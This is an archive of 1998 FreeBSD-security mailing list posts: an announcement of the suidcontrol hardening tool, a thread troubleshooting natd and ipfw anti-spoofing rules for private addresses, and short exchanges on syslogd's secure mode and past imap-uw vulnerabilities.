From owner-freebsd-security Sun Aug 23 08:17:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA25003 for freebsd-security-outgoing; Sun, 23 Aug 1998 08:17:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA24996 for ; Sun, 23 Aug 1998 08:17:28 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA15446; Sun, 23 Aug 1998 11:16:44 -0400 (EDT) Date: Sun, 23 Aug 1998 11:16:44 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: freebsd-security@FreeBSD.ORG cc: robert+suidcontrol@cyrus.watson.org Subject: Announcement: suidcontrol 0.1: suid/sgid policy editor and application software Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org suidcontrol 0.1 suidcontrol is an experimental utility for managing suid/sgid policy under FreeBSD. The primary intent is to allow system managers to generate scripts to apply to new FreeBSD installations so that they can minimize risk associated with the plethora of tools requiring additional privilege to run. Please read the LICENSE file as well as the BUGS and WARNINGS sections of the README before proceeding, as this is DEVELOPMENTAL software. As it is experimental, it should not currently be applied to production machines unless you are absolutely sure. Needless to say, the license covers my absolute lack of responsibility for any problems you incur by not heeding this warning. suidcontrol: http://www.watson.org/fbsd-hardening/suidcontrol.html FreeBSD Hardening Project: http://www.watson.org/fbsd-hardening/ Contact email address: robert+suidcontrol@cyrus.watson.org Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 05:08:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA16237 for freebsd-security-outgoing; Mon, 24 Aug 1998 05:08:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alushta.NL.net (alushta.NL.net [193.78.240.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA16228 for ; Mon, 24 Aug 1998 05:08:50 -0700 (PDT) (envelope-from paulz@trantor.stuyts.nl) Received: from stuyts by alushta.NL.net with UUCP id <10320-31475>; Mon, 24 Aug 1998 14:07:46 +0200 Received: from trantor.stuyts.nl (uucp@localhost) by terminus.stuyts.nl (8.9.1/8.8.8) with UUCP id NAA17074; Mon, 24 Aug 1998 13:57:12 +0200 (MET DST) (envelope-from paulz@trantor.stuyts.nl) Received: from trantor.stuyts.nl (localhost [127.0.0.1]) by trantor.stuyts.nl (8.9.1/8.8.5) with ESMTP id NAA16992; Mon, 24 Aug 1998 13:54:04 +0200 (MET DST) Message-Id: <199808241154.NAA16992@trantor.stuyts.nl> X-Mailer: exmh version 2.0.2 2/24/98 To: "laurens van alphen" Subject: Re: natd and ipfw rules not working together In-reply-to: Your message of "Thu, 20 Aug 1998 13:56:31 +0200." cc: security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 24 Aug 1998 13:54:03 +0200 From: Paul van der Zwan Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > hi all, > > this is my setup > external net: 130.89/16 (ed0) > internal net: 192.168.0/24 (ed1) > running natd and ipfw on the router > > rc.firewall contains: > $fwcmd add divert natd all from any to any via ${natd_interface} > where natd _interface is ed0 > > next the default rc.firewall contained these rules: > > $fwcmd add deny all from 192.168.0.0/16 to any via ${oif} > $fwcmd add deny all from any to 192.168.0.0/16 via ${oif} > > when i apply those, natd clients (on the internal network) can no longer > talk to the outside world. they can however talk to ${oip} and ${iip}. > > any clues? it seems to me natd should translate the packets coming from the > internal network before the 192.168/16 rule sees 'em. right? > I haven't seen any useful followup. But apparently the translated packets are sent thru all filter rules after translation. Does anybody know a way to use rfc1918 addresses internally and still deny them when coming from outside. I am using the same kind of setup here and i have to allow all addresses I use on the inside as destination adresses. It would be nice if the rules could recognize packets that had been 'fixed' by natd. Paul -- Paul van der Zwan paulz @ trantor.stuyts.nl "I think I'll move to theory, everything works in theory..." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 08:34:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA12448 for freebsd-security-outgoing; Mon, 24 Aug 1998 08:34:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alushta.NL.net (alushta.NL.net [193.78.240.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA12440 for ; Mon, 24 Aug 1998 08:34:27 -0700 (PDT) (envelope-from paulz@trantor.stuyts.nl) Received: from stuyts by alushta.NL.net with UUCP id <11238-26112>; Mon, 24 Aug 1998 17:33:14 +0200 Received: from trantor.stuyts.nl (uucp@localhost) by terminus.stuyts.nl (8.9.1/8.8.8) with UUCP id RAA24509; Mon, 24 Aug 1998 17:28:54 +0200 (MET DST) (envelope-from paulz@trantor.stuyts.nl) Received: from trantor.stuyts.nl (localhost [127.0.0.1]) by trantor.stuyts.nl (8.9.1/8.8.5) with ESMTP id RAA04739; Mon, 24 Aug 1998 17:08:54 +0200 (MET DST) Message-Id: <199808241508.RAA04739@trantor.stuyts.nl> X-Mailer: exmh version 2.0.2 2/24/98 To: Neil Blakey-Milner Subject: Re: natd and ipfw rules not working together In-reply-to: Your message of "Mon, 24 Aug 1998 14:50:09 +0200." <19980824145009.A25487@rucus.ru.ac.za> cc: security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 24 Aug 1998 17:08:49 +0200 From: Paul van der Zwan Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Mon 1998-08-24 (13:54), Paul van der Zwan wrote: > > I haven't seen any useful followup. But apparently the translated packets > > are sent thru all filter rules after translation. Does anybody know a > > way to use rfc1918 addresses internally and still deny them when coming > > from outside. > > I'm not sure if this helps, but ipfw has a "skip" ability, which allows you > to make a specified rule skip to a higher rule, bypassing intermediate rules. > > > I am using the same kind of setup here and i have to allow all addresses I use > > on the inside as destination adresses. > > It would be nice if the rules could recognize packets that had been 'fixed' > > by natd. > > You might want to check on ipfw rules with "ACK" or "RST" (ipfw rule > "established"), and "SYN" (ipfw rule setup), which should be adjusted by > natd, but I'd make sure to deny all rfc1918 on the external interface first, > and even then I'm not sure if this can't be bypassed by a craftily spoofed > packet. > That is the problem , if I deny rfc1918 addresses I also deny packets translated by natd. There is AFIAK no way to recognized these ,legitimate rfc1918 addressed, packets from those coming in on the same interface containing an rfc1918 from the start. > I'm not sure if this helps, but maybe you can use "xmit ${natd_interface}" > instead of "via ${natd_interface}" in your rule. Also, being more specific > in your rules might be useful too. (replace those any to any's with more > specific values) > > Also, you might want to debug things by using the "log" option to ipfw. For > your natd stuff, try a "from not natd_network to natd_network in recv ${oif}" > and a "from natd_network to not natd_network out recv ${natd_interface} xmit > ${oif}". > > I'm not terribly sure about this, not able to test this right now, just > throwing some ideas around. > This is the relevant part of my rules at the moment. My laptop is using 192.168.200.95 and is I browse from that thing, the return packets bounce against the commented line , which must be there to deny rfc1918 packets coming in fromthe internet. add divert natd ip from any to any via tun0 add allow ip from any to any via lo0 add allow ip from any to any via de0 add deny log ip from 127.0.0.0/8 to 127.0.0.0/8 add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0 #add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0 add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0 add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0 add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0 add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0 Regards Paul -- Paul van der Zwan paulz @ trantor.stuyts.nl "I think I'll move to theory, everything works in theory..." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 08:57:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA16459 for freebsd-security-outgoing; Mon, 24 Aug 1998 08:57:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from coleridge.kublai.com (coleridge.kublai.com [207.96.1.116]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA16454 for ; Mon, 24 Aug 1998 08:57:48 -0700 (PDT) (envelope-from shmit@natasya.kublai.com) Received: from natasya.kublai.com (natasya.kublai.com [207.172.25.236]) by coleridge.kublai.com (8.8.8/8.8.8) with ESMTP id LAA07934; Mon, 24 Aug 1998 11:56:46 -0400 (EDT) (envelope-from shmit@natasya.kublai.com) Received: (from shmit@localhost) by natasya.kublai.com (8.8.8/8.8.8) id LAA22225; Mon, 24 Aug 1998 11:56:45 -0400 (EDT) Message-ID: <19980824115644.19643@kublai.com> Date: Mon, 24 Aug 1998 11:56:44 -0400 From: Brian Cully To: "Timothy R. Platt" , security@FreeBSD.ORG Subject: Re: Scaring the bezeesus out of your system admin as a normal user: Reply-To: shmit@kublai.com References: <199808211915.MAA18409@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89i In-Reply-To: ; from Timothy R. Platt on Sat, Aug 22, 1998 at 05:55:35AM -0700 X-Sender: If your mailer pays attention to this, it's broken. X-PGP-Info: finger shmit@kublai.com for my public key. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Aug 22, 1998 at 05:55:35AM -0700, Timothy R. Platt wrote: > Seems to me that if you specify -s, not only do you reject incoming > packets, but you are prevented from sending packets to a remote logging > machine as well. No, you can send packets even if you use -s; -s only prevents a bind to the syslog port. > -a will cause syslog to accept packets from a remote machine which would be > ignored by default. I don't think you need -s with -a. But the man page is unclear in this respect. -- Brian Cully ``And when one of our comrades was taken prisoner, blindfolded, hung upside-down, shot, and burned, we thought to ourselves, `These are the best experiences of our lives''' -Pathology (Joe Frank, Somewhere Out There) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 09:04:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA17638 for freebsd-security-outgoing; Mon, 24 Aug 1998 09:04:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rucus.ru.ac.za (rucus.ru.ac.za [146.231.29.2]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA17207 for ; Mon, 24 Aug 1998 09:03:32 -0700 (PDT) (envelope-from nbm@rucus.ru.ac.za) Received: (qmail 12725 invoked by uid 1003); 24 Aug 1998 16:01:48 -0000 Message-ID: <19980824180148.A11376@rucus.ru.ac.za> Date: Mon, 24 Aug 1998 18:01:48 +0200 From: Neil Blakey-Milner To: Paul van der Zwan Cc: security@FreeBSD.ORG Subject: Re: natd and ipfw rules not working together References: <19980824145009.A25487@rucus.ru.ac.za> <199808241508.RAA04739@trantor.stuyts.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199808241508.RAA04739@trantor.stuyts.nl>; from Paul van der Zwan on Mon, Aug 24, 1998 at 05:08:49PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon 1998-08-24 (17:08), Paul van der Zwan wrote: > add divert natd ip from any to any via tun0 > add allow ip from any to any via lo0 > add allow ip from any to any via de0 > add deny log ip from 127.0.0.0/8 to 127.0.0.0/8 > add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0 > #add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0 > add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0 > add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0 > add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0 > add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0 Ok, maybe I'm missing something here, but: Why do you want to deny stuff from 192.168.0.0:255.255.0.0 that is coming via your tun0 device? I assume this is a modem connection between your work and home or something. You should be more interested in blocking the reserved IPs coming from other devices, surely? You also might want to use rule numbers, to know which rules apply, and in which order. As far as I remember, the most recently applied rule at a number has precedence, and if you don't specify a number, it's given 0. Your most recent case regarding 192.168.0.0:255.255.0.0 would be deny (if you uncomment it). Hope this helps. Neil -- Neil Blakey-Milner nbm@rucus.ru.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 09:33:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA22369 for freebsd-security-outgoing; Mon, 24 Aug 1998 09:33:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [206.107.170.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA22355 for ; Mon, 24 Aug 1998 09:33:13 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Mon, 24 Aug 1998 10:32:27 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma001284; Mon, 24 Aug 98 10:31:59 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.8.8) id KAA05433; Mon, 24 Aug 1998 10:32:08 -0600 (MDT) Date: Mon, 24 Aug 1998 10:32:08 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com Reply-To: Paul Hart To: freebsd-security@FreeBSD.ORG Subject: Re: Scaring the bezeesus out of your system admin as a normal user: In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 21 Aug 1998, Ben wrote: > -s Operate in secure mode. Do not listen for log message from re- > mote machines. This is kind of a related question, but in 2.2.7-RELEASE syslogd appears to have been modified to bind to its UDP port even if it is run with the -s flag. It does discard packets received on the port (but still logs a message about it!), but should it not even bind to the port when running in secure mode? It didn't bind to the port in previous versions, if memory serves. If this was a recent design decision that is meant to last, I think I will hack my syslogd back to the way it used to be. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 10:46:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA05243 for freebsd-security-outgoing; Mon, 24 Aug 1998 10:46:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alushta.NL.net (alushta.NL.net [193.78.240.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA05217 for ; Mon, 24 Aug 1998 10:46:15 -0700 (PDT) (envelope-from paulz@trantor.stuyts.nl) Received: from stuyts by alushta.NL.net with UUCP id <10626-10129>; Mon, 24 Aug 1998 19:45:02 +0200 Received: from trantor.stuyts.nl (uucp@localhost) by terminus.stuyts.nl (8.9.1/8.8.8) with UUCP id TAA26654; Mon, 24 Aug 1998 19:35:28 +0200 (MET DST) (envelope-from paulz@trantor.stuyts.nl) Received: from trantor.stuyts.nl (localhost [127.0.0.1]) by trantor.stuyts.nl (8.9.1/8.8.5) with ESMTP id TAA19285; Mon, 24 Aug 1998 19:26:15 +0200 (MET DST) Message-Id: <199808241726.TAA19285@trantor.stuyts.nl> X-Mailer: exmh version 2.0.2 2/24/98 To: Neil Blakey-Milner Cc: security@FreeBSD.ORG Subject: Re: natd and ipfw rules not working together In-reply-to: Your message of "Mon, 24 Aug 1998 18:01:48 +0200." <19980824180148.A11376@rucus.ru.ac.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 24 Aug 1998 19:26:14 +0200 From: Paul van der Zwan Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Mon 1998-08-24 (17:08), Paul van der Zwan wrote: > > add divert natd ip from any to any via tun0 > > add allow ip from any to any via lo0 > > add allow ip from any to any via de0 > > add deny log ip from 127.0.0.0/8 to 127.0.0.0/8 > > add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0 > > #add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0 > > add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0 > > add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0 > > add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0 > > add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0 > > Ok, maybe I'm missing something here, but: > > Why do you want to deny stuff from 192.168.0.0:255.255.0.0 that is coming via > your tun0 device? I assume this is a modem connection between your work and > home or something. > Tun0 is the modem connection to my ISP. My FreeBSD box is connected to a lan on the de0 interface containing some other computers, using 192.168.200.x as addresses. I don't want any rfc1918 addresses coming in or going out on the link to my ISP. That is the reason for the rules above ( which are a subset of all rules , they are followed by about 30 more) > You should be more interested in blocking the reserved IPs coming from other > devices, surely? That is what I am trying to do. But by enabling the commented rule above I also block packets translated by natd, which I don't want to block but want to allow. Only there is no way discriminate between packets having a rfc1918 destination from the start and those which get it from natd. > > You also might want to use rule numbers, to know which rules apply, and in > which order. As far as I remember, the most recently applied rule at a > number has precedence, and if you don't specify a number, it's given 0. Your > most recent case regarding 192.168.0.0:255.255.0.0 would be deny (if you > uncomment it). I had rules numbered but I found it easier to put them all in a file and use ipfw flush followed by ipfw filename to load them all at once, It is too much trouble renumbering lines in the file if I inserted more lines than I left space for. If I see a deny in the log I ususally use ipfw show if ith is not immediately clear which rule is triggered. > > Hope this helps. Not with my real problem , I'm afraid ;-) Thanks Paul -- Paul van der Zwan paulz @ trantor.stuyts.nl "I think I'll move to theory, everything works in theory..." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 10:53:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA06809 for freebsd-security-outgoing; Mon, 24 Aug 1998 10:53:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tinker.com (troll.tinker.com [204.214.7.146]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA06789 for ; Mon, 24 Aug 1998 10:53:46 -0700 (PDT) (envelope-from kim@tinker.com) Received: by localhost (8.8.5/8.8.5) Received: by mail.tinker.com via smap (V2.0) id xma011269; Mon Aug 24 12:51:50 1998 Received: by localhost (8.8.5/8.8.5) id MAA28744 for ; Mon, 24 Aug 1998 12:55:01 -0500 (CDT) Message-ID: <35E1A831.D12B41A7@tinker.com> Date: Mon, 24 Aug 1998 12:51:45 -0500 From: Kim Shrier Organization: Shrier and Deihl X-Mailer: Mozilla 4.05 [en] (X11; U; FreeBSD 2.2.7-RELEASE i386) MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: natd and ipfw rules not working together References: <199808241508.RAA04739@trantor.stuyts.nl> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Paul van der Zwan wrote: > That is the problem , if I deny rfc1918 addresses I also deny packets > translated by natd. There is AFIAK no way to recognized these > ,legitimate rfc1918 addressed, packets from those coming in on the same > interface containing an rfc1918 from the start. -- snip -- > This is the relevant part of my rules at the moment. > My laptop is using 192.168.200.95 and is I browse from that thing, the return > packets bounce against the commented line , which must be there to deny > rfc1918 packets coming in fromthe internet. > > add divert natd ip from any to any via tun0 > add allow ip from any to any via lo0 > add allow ip from any to any via de0 > add deny log ip from 127.0.0.0/8 to 127.0.0.0/8 > add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0 > #add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0 > add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0 > add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0 > add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0 > add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0 > > Regards > Paul > > -- You need to filter the rfc1918 address that are in the source field before you nat them. Also, you can save yourself some time by moving lo0 and 127.0.0.0/8 rules above the divert rule. Try the following: add allow ip from any to any via lo0 add deny log ip from 127.0.0.0/8 to 127.0.0.0/8 add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0 add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0 add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0 add divert natd ip from any to any via tun0 add allow ip from any to any via de0 add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0 add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0 add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0 add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0 Kim Shrier kim@tinker.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 13:18:54 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA29577 for freebsd-security-outgoing; Mon, 24 Aug 1998 13:18:54 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.craxx.com (craxx.com [195.108.198.119]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA29557 for ; Mon, 24 Aug 1998 13:18:42 -0700 (PDT) (envelope-from lva@dds.nl) Received: from uptight (classless.student.utwente.nl [130.89.230.96]) by mail.craxx.com (8.9.1/8.9.1) with ESMTP id WAA02161; Mon, 24 Aug 1998 22:18:46 +0200 From: "laurens van alphen" To: Cc: "craxx e-consultants" Subject: RE: natd and ipfw rules not working together Date: Mon, 24 Aug 1998 22:17:26 +0200 Message-ID: <000d01bdcf9c$365a7e70$0a00a8c0@uptight.student.utwente.nl> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-reply-to: <35E1A831.D12B41A7@tinker.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hello, >You need to filter the rfc1918 address that are in the source field >before you nat them. Also, you can save yourself some time by moving >lo0 and 127.0.0.0/8 rules above the divert rule. Try the following: > >add allow ip from any to any via lo0 >add deny log ip from 127.0.0.0/8 to 127.0.0.0/8 > >add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0 >add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0 >add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0 > >add divert natd ip from any to any via tun0 > >add allow ip from any to any via de0 >add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0 >add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0 >add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0 >add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0 tun0=ed0 here. the problem here is that they probably hit natd allrigth (as before) but the natd'ed packets walk all the way from the top down. situation: inet --- [ 195.108.198.1 - natd - 192.168.0.1 ] --- clients eg. packet from 12.0.0.1 to 192.168.0.23 (e.g. SYN ACK) real packet: from 12.0.0.1 to 195.108.198.1 (recv in ed0) natd changes this to: from 12.0.0.1 to 192.168.0.23 (still recv in ed0) and this packets starts at rule 0. natd doesn't touch the interfaces (maybe it should?) now the rule: add deny log all from any to 192.168.0.0:255.255.0.0 in recv ed0 will block this packet and it's dropped. natd should either: - mark packets as 'processed' so we can skip those later on. - change the 'recv' interface any ideas? -- laurens van alphen craxx e-consultants alphen@craxx.com http://craxx.com/ -- de informatie verzonden met dit e-mail bericht is uitsluitend bestemd voor de geadresseerde. gebruik van deze informatie door anderen dan de geadresseerde is verboden. openbaarmaking, vermenigvuldiging, verspreiding en/of verstrekking van deze informatie aan derden is niet toegestaan. craxx staat niet in voor de juiste en volledige verbrenging van de inhoud van een verzonden e-mail, noch voor tijdige ontvangst daarvan. -- the information contained in this communication is confidential and may be legally privileged. it is intended solely for the use of the individual or entity to whom it is addressed and others authorised to receive it. if you are not the intended recipient you are hereby notified that any disclosure, copying, distribution or taking any action in reliance of the contents of this information is strictly prohibited and may be unlawful. craxx is either liable for the proper and complete transmission of the information contained in this communication nor for any delay in its receipt. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 15:18:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA15346 for freebsd-security-outgoing; Mon, 24 Aug 1998 15:18:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA15328 for ; Mon, 24 Aug 1998 15:18:11 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.1 [OUT])) id PAA17665; Mon, 24 Aug 1998 15:18:56 -0700 (PDT) Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id PAA21296; Mon, 24 Aug 1998 15:16:06 -0700 Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id QAA22718; Mon, 24 Aug 1998 16:16:06 -0600 Message-ID: <35E1E626.8B26000C@softweyr.com> Date: Mon, 24 Aug 1998 16:16:06 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.04 [en] (X11; I; FreeBSD 2.2.6-RELEASE i386) MIME-Version: 1.0 To: "Dag-Erling Coidan Smørgrav" CC: freebsd-security@FreeBSD.ORG Subject: Re: REQ: free pop3 daemon recommendations References: <20938.903553244@axl.training.iafrica.com> <35DE1217.8472B1A1@softweyr.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dag-Erling Coidan Smørgrav wrote: > > Wes Peters writes: > > imap-uw has had more than it's share of security exploits of late, too. > > The FreeBSD version has (hopefully) been patched to keep up with them. > > I'm aware of only one recent imap-uw exploit, in 4.1b IIRC. I'd be > grateful for any information about other security problems with > imap-uw. That's probably the one I'm thinking of. IIRC, those who looked it over found the code a ripe ground for buffer overflows, and the code generally of poor "university hackathon" quality. Too bad Charlie Crittenden (my most stringent prof in CS) wasn't the principal investigator, the code would be prettier than a Pulitzer prize winning novel, AND work better, too. He was a gem. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 24 19:21:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA16590 for freebsd-security-outgoing; Mon, 24 Aug 1998 19:21:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA16570 for ; Mon, 24 Aug 1998 19:21:42 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id TAA20339; Mon, 24 Aug 1998 19:20:54 -0700 (PDT) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma020337; Mon Aug 24 19:20:29 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id TAA17312; Mon, 24 Aug 1998 19:20:29 -0700 (PDT) From: Archie Cobbs Message-Id: <199808250220.TAA17312@bubba.whistle.com> Subject: Re: Scaring the bezeesus out of your system admin as a normal user: In-Reply-To: from Paul Hart at "Aug 24, 98 10:32:08 am" To: hart@iserver.com Date: Mon, 24 Aug 1998 19:20:28 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Paul Hart writes: > This is kind of a related question, but in 2.2.7-RELEASE syslogd appears > to have been modified to bind to its UDP port even if it is run with the > -s flag. It does discard packets received on the port (but still logs a > message about it!), but should it not even bind to the port when running > in secure mode? It didn't bind to the port in previous versions, if > memory serves. > > If this was a recent design decision that is meant to last, I think I will > hack my syslogd back to the way it used to be. If you do, send it in with send-pr... this behavior seems kindof silly. -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send 